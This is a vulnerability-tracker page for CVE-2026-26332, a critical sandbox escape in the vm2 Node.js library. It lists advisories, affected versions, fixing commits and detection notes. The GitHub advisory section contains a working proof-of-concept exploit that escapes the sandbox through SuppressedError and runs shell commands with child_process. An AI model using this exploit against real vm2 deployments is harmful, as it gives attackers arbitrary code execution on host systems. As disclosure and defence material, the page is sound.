CVE-2026-26332
published 2026-05-04CVE-2026-26332: vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This…
PriorityP264critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
EPSS
0.71%
48.9th percentile
vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ansible-automation-platform | automation-portal | — | — |
| patriksimek | vm2 | < 3.11.0 | 3.11.0 |
| rhdh | rhdh-hub-rhel9 | — | — |
| vm2_project | vm2 | < 3.11.0 | 3.11.0 |
| vm2_project | vm2 | >= 0 < 3.11.0 | 3.11.0 |
Detection & IOCsextracted from sources · hover to see the quote
- →Sandbox escape is triggered via exploitation of the `SuppressedError` mechanism in vm2, causing rejection callbacks to be handled on the host side instead of within sandbox isolation — monitor for unexpected code execution originating from vm2 sandbox contexts ↗
- →Any Node.js process running vm2 versions prior to 3.11.0 is vulnerable; detect outdated vm2 package versions in deployed environments ↗
- →Review the two upstream fixing commits to understand the exact code paths changed and build targeted code-level detections or audit rules around SuppressedError handling in vm2 ↗
- ·Red Hat Developer Hub (rhdh/rhdh-hub-rhel9) is NOT affected because vm2 is only a development dependency and the vulnerable code path cannot be reached by an adversary — do not prioritize patching in that context ↗
- ·The Self-service automation portal 2 package (ansible-automation-platform/automation-portal) IS confirmed affected and should be prioritized for patching to vm2 >= 3.11.0 ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vendor_redhat10.0CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
VM2 Has a Sandbox Escape Issue via SuppressedError
ghsa·2026-05-05
CVE-2026-26332 [CRITICAL] CWE-693 VM2 Has a Sandbox Escape Issue via SuppressedError
VM2 Has a Sandbox Escape Issue via SuppressedError
In vm2 v3.10.4 on Node.js v24.13.0, `SuppressedError` allows attackers to escape the sandbox and run arbitrary code.
### PoC
```js
const { VM } = require("vm2");
const vm = new VM();
vm.run(`
const ds = new DisposableStack();
ds.defer(() => { throw null; });
ds.defer(() => {
const e = Error();
e.name = Symbol();
e.stack;
});
try {
ds.dispose();
} catch(e) {
const Function = e.suppressed.constructor.constructor;
const process = new Function("return process;")();
const { execSync } = process.mainModule.require("node:child_process");
execSync("echo pwned", { stdio: "inherit" });
}
`);
```
VulDB
patriksimek vm2 up to 3.10.x code injection (GHSA-55hx-c926-fr95 / WID-SEC-2026-1349)
vuldb·2026-05-04·CVSS 9.8
CVE-2026-26332 [CRITICAL] patriksimek vm2 up to 3.10.x code injection (GHSA-55hx-c926-fr95 / WID-SEC-2026-1349)
A vulnerability categorized as critical has been discovered in patriksimek vm2 up to 3.10.x. The affected element is an unknown function. The manipulation results in code injection.
This vulnerability is identified as CVE-2026-26332. The attack can be executed remotely. There is not any exploit available.
It is advisable to upgrade the affected component.
Red Hat
vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape
vendor_redhat·2026-05-04·CVSS 10.0
CVE-2026-26332 [CRITICAL] CWE-653 vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape
vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape
A flaw was found in vm2, an open-source sandbox for Node.js. This vulnerability allows a remote attacker to escape the sandbox environment by exploiting the `SuppressedError` mechanism. Successful exploitation can lead to arbitrary code execution on the host system, compromising the integrity and confidentiality of the affected system.
Statement: This is an Important flaw in the vm2 Node.js sandbox, enabling a remote attacker to escape the sandbox and achieve arbitrary code execution. This happens because the sandbox fails to run rejection call backs within the sandbox isolation, an attacker that have privileges or tricks the user to run a maliciously crafted code can leverage that to cause suppressed errors to be hand
No detection rules found.
No public exploits indexed.
Bugzilla
CVE-2026-26332 vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape
bugzilla·2026-05-04·CVSS 10.0
CVE-2026-26332 [CRITICAL] CVE-2026-26332 vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape
CVE-2026-26332 vm2: vm2: Arbitrary code execution via SuppressedError sandbox escape
vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0.
Discussion:
Upstream public commits fixing this issue:
https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f
https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338
Those commits are contained in the following upstream releases:
$ git tag --contains 4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f
v3.11.0
v3.11.1
v3.11.2
v3.11.3
$ git tag --contains d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338
v3.11.0
v3.11.1
v3.11.2
v3.11.3
Hackernews
vm2 Node.js Library Vulnerabilities Enable Sandbox Escape and Arbitrary Code Execution
blogs_hackernews·2026-05-07·CVSS 10.0
CVE-2026-24118 [CRITICAL] vm2 Node.js Library Vulnerabilities Enable Sandbox Escape and Arbitrary Code Execution
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## vm2 Node.js Library Vulnerabilities Enable Sandbox Escape and Arbitrary Code Execution
A dozen critical security vulnerabilities have been disclosed in the vm2 Node.js library that could be exploited by bad actors to break out of the sandbox and execute arbitrary code on susceptible systems.
vm2 is an open-source library used to run untrusted JavaScript code inside a secure sandbox by intercepting and proxying JavaScript objects to prevent sandboxed code from accessing the host environment.
The security flaws are listed below -
CVE-2026-24118 (CVSS score: 9.8) - A vulnerability that allows sandbox escape via "__lookupGette
https://github.com/patriksimek/vm2/releases/tag/v3.11.0https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95https://access.redhat.com/security/cve/CVE-2026-26332https://bugzilla.redhat.com/show_bug.cgi?id=2466508https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-26332.json
2026-05-04
Published